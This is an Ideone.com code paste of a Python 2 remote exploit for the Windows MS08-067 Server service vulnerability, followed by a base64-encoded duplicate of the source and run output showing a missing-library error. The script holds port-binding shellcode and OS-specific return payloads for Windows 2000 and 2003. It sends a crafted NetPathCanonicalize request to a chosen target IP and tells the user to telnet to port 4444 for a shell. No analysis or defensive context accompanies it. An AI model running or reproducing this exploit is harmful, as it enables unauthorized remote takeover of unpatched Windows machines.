Ideone.com

download

copy

#!/usr/bin/env python
#############################################################################
#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
#   www.hackingspirits.com
#   www.coffeeandsecurity.com
#   Email: d3basis.m0hanty @ gmail.com
#############################################################################
 
import struct
import sys
 
from threading import Thread    #Thread is imported incase you would like to modify
                                #the src to run against multiple targets.
 
try:
    from impacket import smb
    from impacket import uuid
    from impacket.dcerpc import dcerpc
    from impacket.dcerpc import transport
except ImportError, _:
    print 'Install the following library to make this script work'
    print 'Impacket : http://o...content-available-to-author-only...y.com/projects/impacket.html'
    print 'PyCrypto : http://w...content-available-to-author-only...k.ca/python/code/crypto.html'
    sys.exit(1)
 
 
print '#######################################################################'
print '#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '#   www.hackingspirits.com'
print '#   www.coffeeandsecurity.com'
print '#   Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################\n'
 
 
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
 
 
#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41'
payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'
 
#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'
 
 
if sys.argv[2]=='1':    #Windows 2000 Payload
    payload=payload_1
    print '[-]Windows 2000 payload loaded'
if sys.argv[2]=='2':    #Windows 2003[SP2] Payload
    payload=payload_2
    print '[-]Windows 2003[SP2] payload loaded'
 
 
class SRVSVC_Exploit(Thread):
    def __init__(self, target, osver, port=445):
        super(SRVSVC_Exploit, self).__init__()
        self.__port   = port
        self.target   = target
        self.osver   = osver
 
    def __DCEPacket(self):
        print '[-]Initiating connection'
        self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
        self.__trans.connect()
        print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
        self.__dce = self.__trans.DCERPC_class(self.__trans)
        self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
 
        # Constructing Malicious Packet
        self.__stub='\x01\x00\x00\x00'
        self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
        self.__stub+=shellcode
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
        self.__stub+=payload
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
        self.__stub+='\x01\x00\x00\x00'
        return
 
    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)   #0x1f (or 31)- NetPathCanonicalize Operation
        print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...'
 
if __name__ == '__main__':
       try:
               target = sys.argv[1]
               osver = sys.argv[2]
       except IndexError:
               print '\nUsage: %s <target ip> <os version>\n' % sys.argv[0]
               print 'Example: srvsvcexpl.py 192.168.1.1 2\n'
               print 'Select OS Version'
               print '[-]Windows 2000: OS Version = 1'
               print '[-]Windows 2003[SP2]: OS Version = 2'
 
               sys.exit(-1)
 
current = SRVSVC_Exploit(target, osver)
current.start()
#print '[-]Exploit sent to target successfully...\n[-]Telnet to port 4444 on target machine...'

IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgICBNUzA4LTA2NyBFeHBsb2l0IGJ5IERlYmFzaXMgTW9oYW50eSAoYWthIFRyMHkvbm9wc2xlZCkKIyAgIHd3dy5oYWNraW5nc3Bpcml0cy5jb20KIyAgIHd3dy5jb2ZmZWVhbmRzZWN1cml0eS5jb20KIyAgIEVtYWlsOiBkM2Jhc2lzLm0waGFudHkgQCBnbWFpbC5jb20KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKCmltcG9ydCBzdHJ1Y3QKaW1wb3J0IHN5cwoKZnJvbSB0aHJlYWRpbmcgaW1wb3J0IFRocmVhZCAgICAjVGhyZWFkIGlzIGltcG9ydGVkIGluY2FzZSB5b3Ugd291bGQgbGlrZSB0byBtb2RpZnkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjdGhlIHNyYyB0byBydW4gYWdhaW5zdCBtdWx0aXBsZSB0YXJnZXRzLgoKdHJ5OgogICAgZnJvbSBpbXBhY2tldCBpbXBvcnQgc21iCiAgICBmcm9tIGltcGFja2V0IGltcG9ydCB1dWlkCiAgICBmcm9tIGltcGFja2V0LmRjZXJwYyBpbXBvcnQgZGNlcnBjCiAgICBmcm9tIGltcGFja2V0LmRjZXJwYyBpbXBvcnQgdHJhbnNwb3J0CmV4Y2VwdCBJbXBvcnRFcnJvciwgXzoKICAgIHByaW50ICdJbnN0YWxsIHRoZSBmb2xsb3dpbmcgbGlicmFyeSB0byBtYWtlIHRoaXMgc2NyaXB0IHdvcmsnCiAgICBwcmludCAnSW1wYWNrZXQgOiBodHRwOi8vby4uLmNvbnRlbnQtYXZhaWxhYmxlLXRvLWF1dGhvci1vbmx5Li4ueS5jb20vcHJvamVjdHMvaW1wYWNrZXQuaHRtbCcKICAgIHByaW50ICdQeUNyeXB0byA6IGh0dHA6Ly93Li4uY29udGVudC1hdmFpbGFibGUtdG8tYXV0aG9yLW9ubHkuLi5rLmNhL3B5dGhvbi9jb2RlL2NyeXB0by5odG1sJwogICAgc3lzLmV4aXQoMSkKCgpwcmludCAnIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMnCnByaW50ICcjICAgTVMwOC0wNjcgRXhwbG9pdCBieSBEZWJhc2lzIE1vaGFudHkgKGFrYSBUcjB5L25vcHNsZWQpJwpwcmludCAnIyAgIHd3dy5oYWNraW5nc3Bpcml0cy5jb20nCnByaW50ICcjICAgd3d3LmNvZmZlZWFuZHNlY3VyaXR5LmNvbScKcHJpbnQgJyMgICBFbWFpbDogZDNiYXNpcy5tMGhhbnR5IEAgZ21haWwuY29tJwpwcmludCAnIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcbicKCgojUG9ydGJpbmQgc2hlbGxjb2RlIGZyb20gbWV0YXNwbG9pdDsgQmluZHMgcG9ydCB0byBUQ1AgcG9ydCA0NDQ0CnNoZWxsY29kZSAgPSAiXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MCIKc2hlbGxjb2RlICs9ICJceDI5XHhjOVx4ODNceGU5XHhiMFx4ZThceGZmXHhmZlx4ZmZceGZmXHhjMFx4NWVceDgxXHg3Nlx4MGVceGU5IgpzaGVsbGNvZGUgKz0gIlx4NGFceGI2XHhhOVx4ODNceGVlXHhmY1x4ZTJceGY0XHgxNVx4MjBceDVkXHhlNFx4MDFceGIzXHg0OVx4NTYiCnNoZWxsY29kZSArPSAiXHgxNlx4MmFceDNkXHhjNVx4Y2RceDZlXHgzZFx4ZWNceGQ1XHhjMVx4Y2FceGFjXHg5MVx4NGJceDU5XHgyMiIKc2hlbGxjb2RlICs9ICJceGE2XHg1Mlx4M2RceGY2XHhjOVx4NGJceDVkXHhlMFx4NjJceDdlXHgzZFx4YThceDA3XHg3Ylx4NzZceDMwIgpzaGVsbGNvZGUgKz0gIlx4NDVceGNlXHg3Nlx4ZGRceGVlXHg4Ylx4N2NceGE0XHhlOFx4ODhceDVkXHg1ZFx4ZDJceDFlXHg5Mlx4ODEiCnNoZWxsY29kZSArPSAiXHg5Y1x4YWZceDNkXHhmNlx4Y2RceDRiXHg1ZFx4Y2ZceDYyXHg0Nlx4ZmRceDIyXHhiNlx4NTZceGI3XHg0MiIKc2hlbGxjb2RlICs9ICJceGVhXHg2Nlx4M2RceDIwXHg4NVx4NmVceGFhXHhjOFx4MmFceDdiXHg2ZFx4Y2RceDYyXHgwOVx4ODZceDIyIgpzaGVsbGNvZGUgKz0gIlx4YTlceDQ2XHgzZFx4ZDlceGY1XHhlN1x4M2RceGU5XHhlMVx4MTRceGRlXHgyN1x4YTdceDQ0XHg1YVx4ZjkiCnNoZWxsY29kZSArPSAiXHgxNlx4OWNceGQwXHhmYVx4OGZceDIyXHg4NVx4OWJceDgxXHgzZFx4YzVceDliXHhiNlx4MWVceDQ5XHg3OSIKc2hlbGxjb2RlICs9ICJceDgxXHg4MVx4NWJceDU1XHhkMlx4MWFceDQ5XHg3Zlx4YjZceGMzXHg1M1x4Y2ZceDY4XHhhN1x4YmVceGFiIgpzaGVsbGNvZGUgKz0gIlx4YmNceDIwXHhiNFx4NTZceDM5XHgyMlx4NmZceGEwXHgxY1x4ZTdceGUxXHg1Nlx4M2ZceDE5XHhlNVx4ZmEiCnNoZWxsY29kZSArPSAiXHhiYVx4MTlceGY1XHhmYVx4YWFceDE5XHg0OVx4NzlceDhmXHgyMlx4YTdceGY1XHg4Zlx4MTlceDNmXHg0OCIKc2hlbGxjb2RlICs9ICJceDdjXHgyMlx4MTJceGIzXHg5OVx4OGRceGUxXHg1Nlx4M2ZceDIwXHhhNlx4ZjhceGJjXHhiNVx4NjZceGMxIgpzaGVsbGNvZGUgKz0gIlx4NGRceGU3XHg5OFx4NDBceGJlXHhiNVx4NjBceGZhXHhiY1x4YjVceDY2XHhjMVx4MGNceDAzXHgzMFx4ZTAiCnNoZWxsY29kZSArPSAiXHhiZVx4YjVceDYwXHhmOVx4YmRceDFlXHhlM1x4NTZceDM5XHhkOVx4ZGVceDRlXHg5MFx4OGNceGNmXHhmZSIKc2hlbGxjb2RlICs9ICJceDE2XHg5Y1x4ZTNceDU2XHgzOVx4MmNceGRjXHhjZFx4OGZceDIyXHhkNVx4YzRceDYwXHhhZlx4ZGNceGY5IgpzaGVsbGNvZGUgKz0gIlx4YjBceDYzXHg3YVx4MjBceDBlXHgyMFx4ZjJceDIwXHgwYlx4N2JceDc2XHg1YVx4NDNceGI0XHhmNFx4ODQiCnNoZWxsY29kZSArPSAiXHgxN1x4MDhceDlhXHgzYVx4NjRceDMwXHg4ZVx4MDJceDQyXHhlMVx4ZGVceGRiXHgxN1x4ZjlceGEwXHg1NiIKc2hlbGxjb2RlICs9ICJceDljXHgwZVx4NDlceDdmXHhiMlx4MWRceGU0XHhmOFx4YjhceDFiXHhkY1x4YThceGI4XHgxYlx4ZTNceGY4IgpzaGVsbGNvZGUgKz0gIlx4MTZceDlhXHhkZVx4MDRceDMwXHg0Zlx4NzhceGZhXHgxNlx4OWNceGRjXHg1Nlx4MTZceDdkXHg0OVx4NzkiCnNoZWxsY29kZSArPSAiXHg2Mlx4MWRceDRhXHgyYVx4MmRceDJlXHg0OVx4N2ZceGJiXHhiNVx4NjZceGMxXHgxOVx4YzBceGIyXHhmNiIKc2hlbGxjb2RlICs9ICJceGJhXHhiNVx4NjBceDU2XHgzOVx4NGFceGI2XHhhOSIKCgojUGF5bG9hZCBmb3IgV2luZG93cyAyMDAwIHRhcmdldApwYXlsb2FkXzE9J1x4NDFceDAwXHg1Y1x4MDBceDJlXHgwMFx4MmVceDAwXHg1Y1x4MDBceDJlXHgwMFx4MmVceDAwXHg1Y1x4MDAnCnBheWxvYWRfMSs9J1x4NDFceDQxXHg0MVx4NDFceDQxXHg0MVx4NDFceDQxJwpwYXlsb2FkXzErPSdceDQxXHg0MVx4NDFceDQxXHg0MVx4NDFceDQxXHg0MScKcGF5bG9hZF8xKz0nXHg0MVx4NDEnCnBheWxvYWRfMSs9J1x4MmZceDY4XHgxOFx4MDBceDhiXHhjNFx4NjZceDA1XHg5NFx4MDRceDhiXHgwMFx4ZmZceGUwJwpwYXlsb2FkXzErPSdceDQzXHg0M1x4NDNceDQzXHg0M1x4NDNceDQzXHg0MycKcGF5bG9hZF8xKz0nXHg0M1x4NDNceDQzXHg0M1x4NDNceDQzXHg0M1x4NDMnCnBheWxvYWRfMSs9J1x4NDNceDQzXHg0M1x4NDNceDQzXHg0M1x4NDNceDQzJwpwYXlsb2FkXzErPSdceDQzXHg0M1x4NDNceDQzXHg0M1x4NDNceDQzXHg0MycKcGF5bG9hZF8xKz0nXHg0M1x4NDNceDQzXHg0M1x4NDNceDQzXHg0M1x4NDMnCnBheWxvYWRfMSs9J1x4ZWJceGNjJwpwYXlsb2FkXzErPSdceDAwXHgwMCcKCiNQYXlsb2FkIGZvciBXaW5kb3dzIDIwMDNbU1AyXSB0YXJnZXQKcGF5bG9hZF8yPSdceDQxXHgwMFx4NWNceDAwJwpwYXlsb2FkXzIrPSdceDJlXHgwMFx4MmVceDAwXHg1Y1x4MDBceDJlXHgwMCcKcGF5bG9hZF8yKz0nXHgyZVx4MDBceDVjXHgwMFx4MGFceDMyXHhiYlx4NzcnCnBheWxvYWRfMis9J1x4OGJceGM0XHg2Nlx4MDVceDYwXHgwNFx4OGJceDAwJwpwYXlsb2FkXzIrPSdceDUwXHhmZlx4ZDZceGZmXHhlMFx4NDJceDg0XHhhZScKcGF5bG9hZF8yKz0nXHhiYlx4NzdceGZmXHhmZlx4ZmZceGZmXHgwMVx4MDAnCnBheWxvYWRfMis9J1x4MDFceDAwXHgwMVx4MDBceDAxXHgwMFx4NDNceDQzJwpwYXlsb2FkXzIrPSdceDQzXHg0M1x4MzdceDQ4XHhiYlx4NzdceGY1XHhmZicKcGF5bG9hZF8yKz0nXHhmZlx4ZmZceGQxXHgyOVx4YmNceDc3XHhmNFx4NzUnCnBheWxvYWRfMis9J1x4YmRceDc3XHg0NFx4NDRceDQ0XHg0NFx4OWVceGY1JwpwYXlsb2FkXzIrPSdceGJiXHg3N1x4NTRceDEzXHhiZlx4NzdceDM3XHhjNicKcGF5bG9hZF8yKz0nXHhiYVx4NzdceGY5XHg3NVx4YmRceDc3XHgwMFx4MDAnCgoKaWYgc3lzLmFyZ3ZbMl09PScxJzogICAgI1dpbmRvd3MgMjAwMCBQYXlsb2FkCiAgICBwYXlsb2FkPXBheWxvYWRfMQogICAgcHJpbnQgJ1stXVdpbmRvd3MgMjAwMCBwYXlsb2FkIGxvYWRlZCcKaWYgc3lzLmFyZ3ZbMl09PScyJzogICAgI1dpbmRvd3MgMjAwM1tTUDJdIFBheWxvYWQKICAgIHBheWxvYWQ9cGF5bG9hZF8yCiAgICBwcmludCAnWy1dV2luZG93cyAyMDAzW1NQMl0gcGF5bG9hZCBsb2FkZWQnCgoKY2xhc3MgU1JWU1ZDX0V4cGxvaXQoVGhyZWFkKToKICAgIGRlZiBfX2luaXRfXyhzZWxmLCB0YXJnZXQsIG9zdmVyLCBwb3J0PTQ0NSk6CiAgICAgICAgc3VwZXIoU1JWU1ZDX0V4cGxvaXQsIHNlbGYpLl9faW5pdF9fKCkKICAgICAgICBzZWxmLl9fcG9ydCAgID0gcG9ydAogICAgICAgIHNlbGYudGFyZ2V0ICAgPSB0YXJnZXQKICAgICAgICBzZWxmLm9zdmVyICAgPSBvc3ZlcgoKICAgIGRlZiBfX0RDRVBhY2tldChzZWxmKToKICAgICAgICBwcmludCAnWy1dSW5pdGlhdGluZyBjb25uZWN0aW9uJwogICAgICAgIHNlbGYuX190cmFucyA9IHRyYW5zcG9ydC5EQ0VSUENUcmFuc3BvcnRGYWN0b3J5KCduY2Fjbl9ucDolc1tcXHBpcGVcXGJyb3dzZXJdJyAlIHNlbGYudGFyZ2V0KQogICAgICAgIHNlbGYuX190cmFucy5jb25uZWN0KCkKICAgICAgICBwcmludCAnWy1dY29ubmVjdGVkIHRvIG5jYWNuX25wOiVzW1xccGlwZVxcYnJvd3Nlcl0nICUgc2VsZi50YXJnZXQKICAgICAgICBzZWxmLl9fZGNlID0gc2VsZi5fX3RyYW5zLkRDRVJQQ19jbGFzcyhzZWxmLl9fdHJhbnMpCiAgICAgICAgc2VsZi5fX2RjZS5iaW5kKHV1aWQudXVpZHR1cF90b19iaW4oKCc0YjMyNGZjOC0xNjcwLTAxZDMtMTI3OC01YTQ3YmY2ZWUxODgnLCAnMy4wJykpKQogICAgICAgIAogICAgICAgICMgQ29uc3RydWN0aW5nIE1hbGljaW91cyBQYWNrZXQKICAgICAgICBzZWxmLl9fc3R1Yj0nXHgwMVx4MDBceDAwXHgwMCcKICAgICAgICBzZWxmLl9fc3R1Yis9J1x4ZDZceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHhkNlx4MDBceDAwXHgwMCcKICAgICAgICBzZWxmLl9fc3R1Yis9c2hlbGxjb2RlCiAgICAgICAgc2VsZi5fX3N0dWIrPSdceDQxXHg0MVx4NDFceDQxXHg0MVx4NDFceDQxXHg0MScKICAgICAgICBzZWxmLl9fc3R1Yis9J1x4NDFceDQxXHg0MVx4NDFceDQxXHg0MVx4NDFceDQxJwogICAgICAgIHNlbGYuX19zdHViKz0nXHg0MVx4NDFceDQxXHg0MVx4NDFceDQxXHg0MVx4NDEnCiAgICAgICAgc2VsZi5fX3N0dWIrPSdceDQxXHg0MVx4NDFceDQxXHg0MVx4NDFceDQxXHg0MScKICAgICAgICBzZWxmLl9fc3R1Yis9J1x4NDFceDQxXHg0MVx4NDFceDQxXHg0MVx4NDFceDQxJwogICAgICAgIHNlbGYuX19zdHViKz0nXHg0MVx4NDFceDQxXHg0MVx4NDFceDQxXHg0MVx4NDEnCiAgICAgICAgc2VsZi5fX3N0dWIrPSdceDQxXHg0MVx4NDFceDQxXHg0MVx4NDFceDQxXHg0MScKICAgICAgICBzZWxmLl9fc3R1Yis9J1x4NDFceDQxXHg0MVx4NDFceDQxXHg0MVx4NDFceDQxJwogICAgICAgIHNlbGYuX19zdHViKz0nXHgwMFx4MDBceDAwXHgwMCcKICAgICAgICBzZWxmLl9fc3R1Yis9J1x4MmZceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgyZlx4MDBceDAwXHgwMCcKICAgICAgICBzZWxmLl9fc3R1Yis9cGF5bG9hZAogICAgICAgIHNlbGYuX19zdHViKz0nXHgwMFx4MDBceDAwXHgwMCcKICAgICAgICBzZWxmLl9fc3R1Yis9J1x4MDJceDAwXHgwMFx4MDBceDAyXHgwMFx4MDBceDAwJwogICAgICAgIHNlbGYuX19zdHViKz0nXHgwMFx4MDBceDAwXHgwMFx4MDJceDAwXHgwMFx4MDAnCiAgICAgICAgc2VsZi5fX3N0dWIrPSdceDVjXHgwMFx4MDBceDAwXHgwMVx4MDBceDAwXHgwMCcKICAgICAgICBzZWxmLl9fc3R1Yis9J1x4MDFceDAwXHgwMFx4MDAnCiAgICAgICAgcmV0dXJuCgogICAgZGVmIHJ1bihzZWxmKToKICAgICAgICBzZWxmLl9fRENFUGFja2V0KCkKICAgICAgICBzZWxmLl9fZGNlLmNhbGwoMHgxZiwgc2VsZi5fX3N0dWIpICAgIzB4MWYgKG9yIDMxKS0gTmV0UGF0aENhbm9uaWNhbGl6ZSBPcGVyYXRpb24KICAgICAgICBwcmludCAnWy1dRXhwbG9pdCBzZW50IHRvIHRhcmdldCBzdWNjZXNzZnVsbHkuLi5cblsxXVRlbG5ldCB0byBwb3J0IDQ0NDQgb24gdGFyZ2V0IG1hY2hpbmUuLi4nCgppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOgogICAgICAgdHJ5OgogICAgICAgICAgICAgICB0YXJnZXQgPSBzeXMuYXJndlsxXQogICAgICAgICAgICAgICBvc3ZlciA9IHN5cy5hcmd2WzJdCiAgICAgICBleGNlcHQgSW5kZXhFcnJvcjoKICAgICAgICAgICAgICAgcHJpbnQgJ1xuVXNhZ2U6ICVzIDx0YXJnZXQgaXA+IDxvcyB2ZXJzaW9uPlxuJyAlIHN5cy5hcmd2WzBdCiAgICAgICAgICAgICAgIHByaW50ICdFeGFtcGxlOiBzcnZzdmNleHBsLnB5IDE5Mi4xNjguMS4xIDJcbicKICAgICAgICAgICAgICAgcHJpbnQgJ1NlbGVjdCBPUyBWZXJzaW9uJwogICAgICAgICAgICAgICBwcmludCAnWy1dV2luZG93cyAyMDAwOiBPUyBWZXJzaW9uID0gMScKICAgICAgICAgICAgICAgcHJpbnQgJ1stXVdpbmRvd3MgMjAwM1tTUDJdOiBPUyBWZXJzaW9uID0gMicKCiAgICAgICAgICAgICAgIHN5cy5leGl0KC0xKQoKY3VycmVudCA9IFNSVlNWQ19FeHBsb2l0KHRhcmdldCwgb3N2ZXIpCmN1cnJlbnQuc3RhcnQoKQojcHJpbnQgJ1stXUV4cGxvaXQgc2VudCB0byB0YXJnZXQgc3VjY2Vzc2Z1bGx5Li4uXG5bLV1UZWxuZXQgdG8gcG9ydCA0NDQ0IG9uIHRhcmdldCBtYWNoaW5lLi4uJw==

Runtime error #stdin #stdout 0.1s 10976KB

stdin

copy

Standard input is empty

stdout

copy

Install the following library to make this script work
Impacket : http://o...content-available-to-author-only...y.com/projects/impacket.html
PyCrypto : http://w...content-available-to-author-only...k.ca/python/code/crypto.html

https://ideone.com/SwJci7

language:

Python (cpython 2.7.16)

created:

visibility:

public

Share or Embed source code

Discover > Sphere Engine API

The brand new service which powers Ideone!

Discover > IDE Widget

Widget for compiling and running the source code in a web browser!

Discover > Sphere Engine API

Discover > IDE Widget

Choose your language